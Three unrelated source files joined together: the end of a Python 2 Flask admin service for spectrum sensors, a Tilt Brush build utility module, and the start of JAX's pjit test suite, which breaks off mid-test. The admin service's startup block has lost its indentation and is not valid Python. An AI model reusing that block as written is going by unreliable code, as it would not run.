        return jsonify(RecomputeOccupancies.resetNoiseFloor(sensorId,
                                                            noiseFloor))
    except:
        print "Unexpected error:", sys.exc_info()[0]
        print sys.exc_info()
        traceback.print_exc()
        util.logStackTrace(sys.exc_info())
        raise
@app.route("/admin/garbageCollect/<sensorId>/<sessionId>", methods=["POST"])
def garbageCollect(sensorId, sessionId):
    """Run the garbage collector for the given sensor's data."""
    @testcase
    def garbageCollectWorker(sensorId, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found", 403)
            return jsonify(GarbageCollect.runGarbageCollector(sensorId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return garbageCollectWorker(sensorId, sessionId)
@app.route("/admin/deleteCaptureEvents/<sensorId>/<startDate>/<sessionId>",
           methods=["POST"])
def deleteCaptureEvents(sensorId, startDate, sessionId):
    """
    Delete the events from the capture db.
    Send a message to the sensor to do the same.
    """
    try:
        if not authentication.checkSessionId(sessionId, ADMIN):
            util.debugPrint("deleteCaptureEvents: failed authentication")
            abort(403)
        # startDate arrives as a URL string; negative timestamps are invalid.
        sdate = int(startDate)
        if sdate < 0:
            util.debugPrint("deleteCaptureEvents: illegal param")
            abort(400)
        else:
            CaptureDb.deleteCaptureDb(sensorId, sdate)
            # Tell the sensor to garbage-collect its own copies too.
            command = json.dumps({"sensorId": sensorId,
                                  "timestamp": sdate,
                                  "command": "garbage_collect"})
            DataStreamSharedState.sendCommandToSensor(sensorId, command)
            return jsonify({STATUS: "OK"})
    except:
        print "Unexpected error:", sys.exc_info()[0]
        print sys.exc_info()
        traceback.print_exc()
        util.logStackTrace(sys.exc_info())
        raise
@app.route("/admin/deleteAllCaptureEvents/<sensorId>/<sessionId>",
           methods=["POST"])
def deleteAllCaptureEvents(sensorId, sessionId):
    """
    Delete all the the capture events from the capture db.
    Send a message to the sensor to do the same.
    """
    # NOTE(review): unlike deleteCaptureEvents, no command is actually sent
    # to the sensor here despite the docstring -- confirm.
    try:
        if not authentication.checkSessionId(sessionId, ADMIN):
            util.debugPrint("deleteCaptureEvents: failed authentication")
            abort(403)
        else:
            CaptureDb.deleteCaptureDb(sensorId)
            return jsonify({STATUS: "OK"})
    except:
        print "Unexpected error:", sys.exc_info()[0]
        print sys.exc_info()
        traceback.print_exc()
        util.logStackTrace(sys.exc_info())
        raise
@app.route("/admin/getSessions/<sessionId>", methods=["POST"])
def getSessions(sessionId):
    """List the active login sessions (admin session required)."""
    @testcase
    def getSessionsWorker(sessionId):
        try:
            # updateSessionTimer=False: listing sessions must not refresh
            # the caller's own session expiry.
            if not authentication.checkSessionId(sessionId,
                                                 ADMIN,
                                                 updateSessionTimer=False):
                return make_response("Session not found", 403)
            return jsonify(SessionLock.getSessions())
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getSessionsWorker(sessionId)
@app.route("/admin/freezeRequest/<sessionId>", methods=["POST"])
def freezeRequest(sessionId):
    """Request the session freeze lock for this admin session."""
    @testcase
    def freezeRequestWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found", 403)
            return jsonify(SessionLock.freezeRequest(sessionId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return freezeRequestWorker(sessionId)
@app.route("/admin/unfreezeRequest/<sessionId>", methods=["POST"])
def unfreezeRequest(sessionId):
    """Release the session freeze lock held by this admin session."""
    @testcase
    def unfreezeRequestWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found", 403)
            return jsonify(SessionLock.freezeRelease(sessionId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return unfreezeRequestWorker(sessionId)
@app.route("/admin/log/<sessionId>", methods=["POST"])
def log(sessionId):
    """
    Logging endpoint; delegates to Log.log().
    URL Path:
        sessionId: session ID of the admin login session.
    HTTP Return Codes:
        - 403 Forbidden: Invalid session ID.
    """
    # SECURITY FIX: this route takes a sessionId but never validated it,
    # unlike every other admin endpoint in this module. Reject
    # unauthenticated callers before delegating.
    if not authentication.checkSessionId(sessionId, ADMIN):
        abort(403)
    return Log.log()
@app.route("/admin/getScreenConfig/<sessionId>", methods=["POST"])
def getScreenConfig(sessionId):
    """
    get screen configuration.
    URL Path:
        sessionId -- the session ID for the login session.
    Returns:
        200 OK on successful completion. A JSON Document
    """
    @testcase
    def getScreenConfigWorker(sessionId):
        try:
            # NOTE(review): no session check is performed here --
            # presumably the screen config is needed before login; confirm.
            screenConfig = Config.getScreenConfig()
            if screenConfig is None:
                config = Config.getDefaultScreenConfig()
                return jsonify(config)
            else:
                return jsonify(screenConfig)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getScreenConfigWorker(sessionId)
@app.route("/admin/setScreenConfig/<sessionId>", methods=["POST"])
def setScreenConfig(sessionId):
    """
    set system configuration
    URL Path:
        sessionId the session Id of the login in session.
    URL Args: None
    Request Body:
        A JSON formatted string containing the system configuration.
    HTTP Return codes:
        200 OK if the invocation successful.
        {status:OK} returned JSON document.
        403 if sessionId is not a valid admin session.
    """
    @testcase
    def setScreenConfigWorker(sessionId):
        try:
            util.debugPrint("setScreenConfig: " + sessionId)
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            # Body is the raw JSON screen configuration document.
            requestStr = request.data
            screenConfig = json.loads(requestStr)
            if Config.setScreenConfig(screenConfig):
                return jsonify({"status": "OK"})
            else:
                # Config rejected the document; no further detail available.
                return jsonify({"status": "NOK", "ErrorMessage": "Unknown"})
        except:
            # Log the full traceback, then re-raise so Flask reports a 500.
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return setScreenConfigWorker(sessionId)
@app.route("/admin/changePassword", methods=["POST"])
def changePassword():
    """
    Change to a new password and email user.
    URL Path:
    URL Args (required):
        - JSON structure of change password data
    Returns:
        200 OK if invocation OK.
        500 if server not configured.
    """
    @testcase
    def changePasswordWorker():
        try:
            util.debugPrint("changePassword")
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                abort(500)
            urlPrefix = Config.getDefaultPath()
            # Body is a JSON document with the change-password fields.
            requestStr = request.data
            accountData = json.loads(requestStr)
            # NOTE(review): sendEmail=False contradicts the "email user"
            # wording in the docstring -- confirm which is intended.
            return jsonify(AccountsChangePassword.changePasswordEmailUser(
                accountData, urlPrefix, sendEmail=False))
        except:
            # Log the full traceback, then re-raise so Flask reports a 500.
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace("Unexpected error:" + str(sys.exc_info()[0]))
            raise
    return changePasswordWorker()
def purgeSensors():
    """
    Run in an infinite loop purging all the sensors that are marked for purging.
    This is invoked as a process from main.

    Every 30 seconds, scans all sensor records and:
      - purges sensors whose status is PURGING,
      - recomputes occupancies for sensors whose status is RECOMPUTING.
    Never returns.
    """
    from Defines import PURGING
    from Defines import RECOMPUTING
    import time
    while True:
        # One pass over every sensor record in the database.
        for sensor in DbCollections.getSensors().find():
            sensorObj = Sensor(sensor)
            if sensorObj.getSensorStatus() == PURGING:
                SensorDb.purgeSensor(sensorObj)
            elif sensorObj.getSensorStatus() == RECOMPUTING:
                RecomputeOccupancies.recomputeOccupanciesWorker(sensorObj.getSensorId())
        # Poll again after 30 seconds.
        time.sleep(30)
if __name__ == '__main__':
launchedFromMain = True
parser = argparse.ArgumentParser(description='Process command line args')
parser.add_argument("--pidfile", help="PID file", default=".admin.pid")
parser.add_argument("--logfile", help="LOG file", default="/tmp/admin.log")
parser.add_argument("--username",
help="USER name",
default="spectrumbrowser")
parser.add_argument("--groupname",
help="GROUP name",
default="spectrumbrowser")
parser.add_argument("--daemon", help="GROUP name", default="True")
args = parser.parse_args()
isDaemon = args.daemon == "True"
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(args.logfile)
logger.addHandler(fh)
timer = RepeatingTimer(3600, GarbageCollect.scanGeneratedDirs)
timer.start()
t = Process(target=purgeSensors)
t.start()
if isDaemon:
import daemon
import daemon.pidfile
context = daemon.DaemonContext()
context.stdin = sys.stdin
context.stderr = open(args.logfile, 'a')
context.stdout = open(args.logfile, 'a')
context.files_preserve = [fh.stream]
context.uid = pwd.getpwnam(args.username).pw_uid
context.gid = pwd.getpwnam(args.groupname).pw_gid
if os.path.exists(args.pidfile):
pid = open(args.pidfile).read()
try:
os.kill(int(pid), 0)
print "service is running -- not starting"
sys.exit(-1)
os._exit(-1)
except:
print "removing pidfile and starting"
os.remove(args.pidfile)
context.pidfile = daemon.pidfile.TimeoutPIDLockFile(args.pidfile)
with context:
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['CORS_HEADERS'] = 'Content-Type'
Log.loadGwtSymbolMap()
app.debug = True
util.debugPrint("Admin service -- starting")
if Config.isConfigured():
authentication.removeAdminSessions()
server = pywsgi.WSGIServer(('0.0.0.0', 8001),
app,
handler_class=WebSocketHandler)
else:
server = pywsgi.WSGIServer(('0.0.0.0', 8001), app)
server.serve_forever()
else:
# for debugging.
with util.pidfile(args.pidfile):
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['CORS_HEADERS'] = 'Content-Type'
Log.loadGwtSymbolMap()
app.debug = True
util.debugPrint("Admin service -- starting")
if Config.isConfigured():
authentication.removeAdminSessions()
server = pywsgi.WSGIServer(('0.0.0.0', 8001),
app,
handler_class=WebSocketHandler)
else:
server = pywsgi.WSGIServer(('0.0.0.0', 8001), app)
server.serve_forever()
|
utils.py | # Copyright 2020 The Tilt Brush Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Non Unity-specific utility functions and classes."""
import os
import contextlib
from unitybuild.constants import InternalError
@contextlib.contextmanager
def ensure_terminate(proc):
    """Ensure that *proc* is dead upon exiting the block."""
    try:
        yield
    finally:
        try:
            # poll() returning None means the process is still alive.
            # (On Windows, terminate() can raise if it already exited.)
            still_running = proc.poll() is None
            if still_running:
                proc.terminate()
        except Exception as exc:
            # Best effort only: report and carry on.
            print("WARN: Could not kill process: %s" % (exc,))
def destroy(file_or_dir):
    """Ensure that *file_or_dir* does not exist in the filesystem,
    deleting it if necessary.

    Files are chmod'ed writable before unlinking so read-only files
    can be deleted (needed on Windows).  A nonexistent path is a no-op.
    Raises InternalError if the path still exists afterwards.
    """
    # Cleanup vs the original: removed an unused `import shutil` and a
    # duplicate `import stat`; hoisted the repeated os.path.join calls.
    import stat
    if os.path.isfile(file_or_dir):
        os.chmod(file_or_dir, stat.S_IWRITE)
        os.unlink(file_or_dir)
    elif os.path.isdir(file_or_dir):
        # Walk bottom-up so files are removed before their parent dirs.
        for root, dirs, files in os.walk(file_or_dir, topdown=False):
            for name in files:
                path = os.path.join(root, name)
                os.chmod(path, stat.S_IWRITE)
                os.unlink(path)
            for name in dirs:
                os.rmdir(os.path.join(root, name))
        os.rmdir(file_or_dir)
    if os.path.exists(file_or_dir):
        raise InternalError("Temp build location '%s' is not empty" % file_or_dir)
def msys_control_c_workaround():
    """Turn off console Ctrl-c support and implement it ourselves."""
    # Used to work around a bug in msys where control-c kills the process
    # abruptly ~100ms after the process receives SIGINT. This prevents us
    # from running cleanup handlers, like the one that kills the Unity.exe
    # subprocess.
    # No-op unless running under an msys shell.
    if not os.getenv('MSYSTEM'):
        return
    import ctypes
    from ctypes.wintypes import HANDLE, DWORD, BOOL
    kernel32 = ctypes.windll.kernel32
    kernel32.GetStdHandle.restype = HANDLE
    kernel32.GetStdHandle.argtypes = (DWORD,)
    #kernel32.GetConsoleMode.restype = BOOL
    kernel32.GetConsoleMode.argtypes = (HANDLE, ctypes.POINTER(DWORD))
    #kernel32.SetConsoleMode.restype = BOOL
    kernel32.SetConsoleMode.argtypes = (HANDLE, DWORD)
    STD_INPUT_HANDLE = DWORD(-10)
    ENABLE_PROCESSED_INPUT = DWORD(1)
    stdin = kernel32.GetStdHandle(STD_INPUT_HANDLE)
    mode = DWORD()
    kernel32.GetConsoleMode(stdin, ctypes.byref(mode))
    # Clear ENABLE_PROCESSED_INPUT so the console stops translating Ctrl-C
    # into a signal; we will detect the keypress ourselves below.
    mode.value = mode.value & ~(ENABLE_PROCESSED_INPUT.value)
    kernel32.SetConsoleMode(stdin, mode)
    # interrupt_main won't interrupt WaitForSingleObject, so monkey-patch
    import subprocess
    def polling_wait(self):
        # NOTE(review): `_subprocess` is the Python 2 module name; on
        # Python 3 this lives in `_winapi` -- confirm on a Windows host.
        from _subprocess import WaitForSingleObject, WAIT_OBJECT_0
        # Wake up every 3 seconds so KeyboardInterrupt can be delivered.
        while WaitForSingleObject(self._handle, 3000) != WAIT_OBJECT_0:
            continue
        return self.poll()
    subprocess.Popen.wait = polling_wait
    import _thread
    import threading
    def look_for_control_c():
        # NOTE(review): on Python 3 msvcrt.getch() returns bytes, so the
        # comparison against the str '\x03' would never match -- verify.
        import msvcrt, _thread
        while msvcrt.getch() != '\x03':
            continue
        _thread.interrupt_main()
    # Daemon thread: must not keep the process alive on exit.
    t = threading.Thread(target=look_for_control_c)
    t.daemon = True
    t.start()
def get_file_version(filename):
    """Return the (major, minor, micro) version of *filename*.

    Raises LookupError if the file has no version information or the
    platform is unsupported (only Windows is implemented)."""
    import platform
    if platform.system() != 'Windows':
        # The never-reachable macOS sketch (reading
        # CFBundleShortVersionString out of Contents/Info.plist via plutil)
        # that used to sit after this raise has been removed as dead code.
        raise LookupError("Not supported yet on macOS")
    import win32api
    ffi = win32api.GetFileVersionInfo(filename, "\\")
    # I don't know the difference between ProductVersion and FileVersion
    # FileVersionMS/LS each pack two 16-bit fields into one 32-bit int.
    def extract_16s(i32):
        return ((i32 >> 16) & 0xffff), i32 & 0xffff
    file_version = extract_16s(ffi['FileVersionMS']) + extract_16s(ffi['FileVersionLS'])
    return file_version[0:3]
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
    """Skip the whole module off GPU/TPU; otherwise enable SPMD lowering."""
    backend = jax.default_backend()
    if backend not in ('gpu', 'tpu'):
        raise unittest.SkipTest("pjit only supports GPU and TPU backends")
    jtu.set_spmd_lowering_flag(True)
def tearDownModule():
    """Undo the SPMD lowering flag set in setUpModule."""
    jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
    """Build a GlobalDeviceArray over *global_mesh* whose global contents are
    arange(prod(global_shape)) as float32, sharded per *mesh_axes*."""
    n_elems = prod(global_shape)
    host_data = np.arange(n_elems, dtype=np.float32).reshape(global_shape)
    def _fetch(index):
        # Each device pulls its own slice of the host array.
        return host_data[index]
    return global_device_array.GlobalDeviceArray.from_callback(
        global_shape, global_mesh, mesh_axes, _fetch)
@curry
def check_1d_2d_mesh(f, set_mesh):
    """Parameterize test *f* over a 1d (x=2) and two 2d (x*y) mesh shapes.

    When set_mesh is True the mesh is also installed around the test via
    jtu.with_mesh_from_kwargs; otherwise the test receives the mesh/resources
    kwargs and is expected to set up the mesh itself.
    """
    return parameterized.named_parameters(
        {"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
        for name, mesh, resources in (
          ("2", (("x", 2),), "x"),
          ("2x1", (("x", 2), ("y", 1)), ("x", "y")),
          ("2x2", (("x", 2), ("y", 2)), ("x", "y")),
        ))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
  """Tests for pjit: basic sharding, sharding constraints, caching,
  nesting/autodiff, vmap/xmap interaction, infeed/outfeed, and the
  lower()/compile() (AOT) path.  Requires a GPU/TPU backend (see
  setUpModule)."""

  @jtu.with_mesh([('x', 1)])
  def testDeviceBufferAval(self):
    @partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
    def f(x):
      return x
    shape = (2, 2)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x)
    expected = x
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 1)
    self.assertAllClose(
        actual.device_buffers[0].to_py(), expected, check_dtypes=False)
    # Repro for a bug on device_buffer aval
    _ = repr(actual.device_buffers)

  @jtu.with_mesh([('x', 2)])
  def testBasic1D(self):
    @partial(pjit,
             in_axis_resources=(P('x'), P('x')),
             out_axis_resources=None)
    def f(x, y):
      return x + y
    shape = (8, 8)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x, x + 1)
    expected = x + (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testBasic2D(self):
    @partial(pjit,
             in_axis_resources=(P(None, 'x', 'y'), P('y')),
             out_axis_resources=P('x'))
    def f(x, y):
      return x @ y
    x_shape = (8, 6, 4)
    y_shape = (4, 2)
    x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
    y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
    actual = f(x, y)
    expected = x @ y
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)
    # Output is sharded on 'x' only, so each half is replicated on 2 devices.
    split0, split1 = np.split(expected, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), split1,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), split1,
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testTwoMeshAxisSharding(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    actual = f(x, x + 1)
    expected = x @ (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)
    splits = np.split(expected, 4)
    self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2)])
  def testBufferDonation(self):
    @partial(pjit,
             in_axis_resources=P('x'),
             out_axis_resources=P('x'),
             donate_argnums=0)
    def f(x, y):
      return x + y
    shard = pjit(lambda x: x, in_axis_resources=P('x'),
                 out_axis_resources=P('x'))
    x = shard(jnp.ones((2, 5)) * 4)
    y = shard(jnp.ones((2, 5)) * 2)
    expected = x + y
    self.assertAllClose(f(x, y), expected)
    # Only argument 0 was donated; y must survive the call.
    self.assertNotDeleted(y)
    self.assertDeleted(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraint(self):
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      y = x + 1
      y = with_sharding_constraint(y, P('x', 'y'))
      return y * 2
    shape = (8, 8)
    x = np.arange(prod(shape)).reshape(shape)
    expected = (x + 1) * 2
    actual = f(x)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

    hlo = jax.xla_computation(f)(np.ones(shape))
    # Annotation from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraintPyTree(self):
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
      x = x.copy()
      x[0]["a"] *= 2
      return x
    shape = (8, 8)
    v = np.arange(prod(shape)).reshape(shape)
    x = [{"a": v, "b": v * 2}, v * 3]
    actual = f(x)
    expected = x.copy()
    expected[0]["a"] *= 2
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertLen(actual[0]["a"].device_buffers, 2)

    hlo = jax.xla_computation(f)(x)
    # Annotations from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testShardingConstraintPyTreeWithUnconstrainedDims(self):
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      x = with_sharding_constraint(
          x, [P(P.UNCONSTRAINED, 'y', None),
              P('x', P.UNCONSTRAINED, None)])
      x = x.copy()
      x[0]['a'] *= 2
      return x
    shape = (2, 8, 8)
    v = np.arange(prod(shape)).reshape(shape)
    x = [{'a': v, 'b': v * 2}, v * 3]
    actual = f(x)
    expected = x.copy()
    expected[0]['a'] *= 2
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertLen(actual[0]['a'].device_buffers, 4)

    # Unconstrained dims show up as unspecified_dims in the MHLO annotation.
    compiler_ir = f.lower(x).compiler_ir(dialect="mhlo")
    self.assertIn("unspecified_dims=[0]", compiler_ir)
    self.assertIn("unspecified_dims=[1]", compiler_ir)

  def testCaching(self):
    def f(x):
      assert should_be_tracing
      return jnp.sin(x) * 2
    x = np.arange(16).reshape(4, 4)
    devices = np.array(list(jax.local_devices())[:4])
    if devices.size < 4:
      raise unittest.SkipTest("Test requires 4 devices")
    devices = devices.reshape((2, 2))
    with mesh(devices, ('x', 'y')):
      should_be_tracing = True
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
    # Re-create the mesh to make sure that has no influence on caching
    with mesh(devices, ('x', 'y')):
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testNested(self):
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
    g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
    x = jnp.arange(16).reshape((4, 4))
    y = g(x)
    self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
    self.assertTrue(hasattr(y, "sharding_spec"))

  @check_1d_2d_mesh(set_mesh=True)
  def testAutodiff(self, mesh, resources):
    if len(mesh) != 2: return
    assert resources == ('x', 'y')
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum(1) * h.sum(),
             in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
    g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
             in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
    jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
                    order=2)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testEvalJaxpr(self):
    x, y = jnp.arange(4), jnp.arange(5)
    f = pjit(lambda x, y: x.sum() + jnp.sin(y),
             in_axis_resources=(P('x'), P('y')),
             out_axis_resources=P('y'))
    f_jaxpr = jax.make_jaxpr(f)(x, y)
    f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
    r, = f_eval(x, y)
    self.assertAllClose(r, x.sum() + jnp.sin(y))

  @jtu.with_mesh([('x', 2)])
  def testNonArrayArg(self):
    self.assertEqual(pjit(lambda x: x + 2,
                          in_axis_resources=None,
                          out_axis_resources=None)(1), 3)

  @jtu.with_mesh([('x', 2)])
  def testNonHashableAxisResources(self):
    x = jnp.arange(4)
    y = pjit(lambda x: {'b': x['a'] + 2},
             in_axis_resources=({'a': P('x')},),
             out_axis_resources={'b': P('x')})({'a': x})
    self.assertAllClose(y, {'b': x + 2})

  @jtu.with_mesh([('x', 2)])
  def testGradOfConstraint(self):
    # TODO(b/213927860): XLA incorrectly simplifies away the sharding constraint
    # on the output.
    if config.jax_enable_mlir:
      raise unittest.SkipTest("test fails with jax_enable_mlir")
    # Make sure that we can compute grads through sharding constraints
    h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
    f = pjit(lambda x: jax.grad(h)(x),
             in_axis_resources=None, out_axis_resources=None)
    x = jnp.arange(8, dtype=jnp.float32)
    self.assertAllClose(f(x), jnp.cos(x))

  @jtu.with_mesh([('x', 2)])
  def testNoopPartitionSpecs(self):
    noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
    x = jnp.arange(8).reshape((2, 2, 2))
    for spec in noops:
      y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
      self.assertAllClose(y, x * 2)

  @jtu.with_mesh([('x', 2)])
  def testVmapModifiesAxisResources(self):
    h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
    eqn = jaxpr.eqns[0]
    self.assertIs(eqn.primitive, pjit_p)
    # vmap permutes the batched args' specs; un-batched ones stay IN_SYNC.
    x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
    self.assertEqual(x_sync, SpecSync.IN_SYNC)
    self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
    x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
    self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
    self.assertEqual(y_sync, SpecSync.IN_SYNC)
    self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2)])
  def testVMap(self):
    f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
    self.assertAllClose(z, x + y)
    self.assertAllClose(w, x)
    self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
    self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))

  @jtu.with_mesh([('x', 2)])
  def testVMapShardingConstraint(self):
    f = pjit(lambda x: with_sharding_constraint(x, P('x')),
             in_axis_resources=P(), out_axis_resources=P('x'))
    x = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
    pjit_eqn, = jaxpr.eqns
    constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
    self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
    self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingInXMap(self):
    h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
    f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
             axis_resources={'i': 'y'})
    x = jnp.arange(16).reshape((4, 4))
    # Swap in a wrapped translation rule to observe what pjit receives,
    # and restore the original rule afterwards.
    rule = xla._translations[pjit_p]
    test_rule_called = False
